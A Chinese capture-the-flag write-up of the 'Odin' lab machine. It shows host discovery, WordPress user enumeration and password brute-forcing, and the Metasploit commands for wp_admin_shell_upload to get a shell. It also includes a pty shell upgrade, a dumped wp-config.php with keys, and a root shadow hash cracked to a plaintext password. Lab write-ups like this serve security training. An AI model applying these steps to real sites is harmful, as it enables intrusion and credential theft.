CTF之“奥丁喝水”
2023-8-7 02:10:18 Author: 小杰安全(查看原文) 阅读量:38 收藏

 我要成为强者,总有一天,我要变得和大叔一样强! ——天明。

慢慢恢复曾经删除的文章...缅怀

查看题目描述

简单翻译一下:一个叫奥丁的家伙去了某个鬼地方,有个叫mimi的人让奥丁喝井水,然后奥丁的左眼睛就瞎了,并告诉他这是获得知识的代价......

emmm,好像和解答题目没什么关系,倒是下面提示貌似要更改host文件

好,开搞

打开靶机

打开kali

查看本机ip

主机发现

靶机信息收集

发现只开放了80端口,尝试访问

发现并不是真正靶机的地址

按照题目的提示 修改本地host文件

再次访问,成功跳转正常页面

这个熟悉的页面,和wp的站点非常相似。(其实在之前我们的nmap已经探测到靶机是wordpress站点)

尝试访问wp的默认登陆页面wp-admin

确实是wp的站点,那二话不多说,wpscan直接锤它一波

直接检测漏洞没有什么发现,再回到登录口看看吧

尝试进行弱口令测试

输入admin 密码随便乱输一通

提示:

Error: The password you entered for the username admin is incorrect.

诶呦,这不证明了admin用户是存在的,那这里存在账户枚举的可能

正好wpscan提供爆破账户的功能,那就利用wp再尝试一波

芜湖~拿到密码

进入后台

简单搜一下通用漏洞

好像没有关于wp5.5类的高危漏洞,不采用文件上传getshell了

我们已经获取了账号密码,考虑直接用msf反弹shell

msfconsoleuse exploit/unix/webapp/wp_admin_shell_uploadset RHOSTS odinset username adminset password qwertyrunshell

查看系统基本信息

利用python3提权

python3 -c "import pty;pty.spawn('/bin/bash')"


后渗透开始,搜寻关于root的信息

先去网站目录下看看,发现相关配置文件

输出看看

<?php/** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */

// ** MySQL settings - You can get this info from your web host ** ///** The name of the database for WordPress */define( 'DB_NAME', 'joomla' );

/** MySQL database username */define( 'DB_USER', 'joomla' );

/** MySQL database password */define( 'DB_PASSWORD', 'joomla' );

/** MySQL hostname */define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */define( 'DB_COLLATE', '' );

/**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */define( 'AUTH_KEY', 'hJ6K`1Lh|p>fc/)&[~yFq~fyW|aIt/aN(t4D{f4q/j.R6[|CNgW{Jgz(,w+L#[3D' );define( 'SECURE_AUTH_KEY', '$NY`wt7VU18-FcJC/|~c*NKy*EJ,]:6jS_ShC20hpZnUhV%+0.=-=PaM_5%shx%f' );define( 'LOGGED_IN_KEY', 'A6R.i/vfrs*.i-e[(Elb*hD}S bV;<%bjd,!${8PRhDl+a0}X:9Y4% 6CJ,]tazm' );define( 'NONCE_KEY', '7B01IEuF=J}ep]`k*oy]{/*L)2O=U5LVJR+YioC?|!~KGdv-b/_ |VmHF[hC: un' );define( 'AUTH_SALT', '7#xk&!&`({X!1nF#jkWiXu$s7<{]vrl_n:n.R!9qy%@l1rDglP&HpB)G{bPdz>mV' );define( 'SECURE_AUTH_SALT', '$KC6{ex+{<*Q:%T:U.`=YHg>`f!:[email protected]%twt2_z=P(([email protected]=q-5e$vg' );define( 'LOGGED_IN_SALT', '6gs|[email protected]?&8NkX:u< F=v^sCcd/CJ#YiI-H*^ OC/SBC6XBh?cRYN(;J3_?3=' );define( 'NONCE_SALT', 'xA+mKYMD;][email protected]>tEi%MT1!<$|<[email protected]|y2WAE=NwR5{3:piVlWHr6JsK[6u' );

/**#@-*/

/** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */$table_prefix = 'wp_';

/** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' );}

/** Sets up WordPress vars and included files. */require_once ABSPATH . 'wp-settings.php';

/** root:$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01:18600:0:99999:7:::*/

一波寻找,发现关于root用户的加密密码

上神器,开膛手约翰john!

获得root密码jasmine

利用我们获取到的密码切换权限

经过一番寻找,在目录下找到了作者的名字bjorn,输出即为Flag

喜欢的朋友劳烦点的小小的关注吧~


文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNTIwMjY3NA==&mid=2247484574&idx=1&sn=3c86c0dec6a9ef4f7d6f70b62eb47c93&chksm=c163f383f6147a95e4733da847f8f4e99b3df240acfac96f464066235575b4703b363bdc90fd&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh